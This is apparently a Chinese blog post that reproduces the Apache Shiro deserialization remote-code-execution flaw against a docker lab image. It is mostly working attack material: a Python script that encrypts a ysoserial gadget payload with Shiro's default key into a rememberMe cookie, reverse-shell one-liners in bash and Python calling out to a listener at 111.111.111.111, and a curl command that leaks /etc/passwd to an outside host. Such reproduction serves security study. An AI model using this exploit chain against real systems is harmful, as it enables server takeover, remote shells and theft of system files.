Apache Shiro反序列化远程代码执行 复现 环境搭建

docker:

docker pull medicean/vulapps:s_shiro_1

docker run -d -p 5001:8080 medicean/vulapps:s_shiro_1

 

生成payoad:

yum install maven -y

git clone https://github.com/frohoff/ysoserial.git

cd ysoserial/

mvn package -DskipTests

cp target/ysoserial-0.0.6-SNAPSHOT-all.jar /tmp

yum install python3-devel

pip3 install pycryptodome

shiro.py

# pip install pycrypto
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.5-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    with open("/tmp/payload.cookie", "w") as fpw:
        print("rememberMe={}".format(payload.decode()), file=fpw)

python3 shiro.py "ping riuvkb.dnslog.cn"

 

Nc反弹shell

监听

nc -lvvp 9999

反弹

bash -i >& /dev/tcp/111.111.111.111/9999 0>&1

或者

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('111.111.111.111',9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

 

服务器日志查看回显:

curl xxxx.cn/$(cat /etc/passwd |xargs| sed 's/ //g')

 

你可能感兴趣的:(Python,网络安全)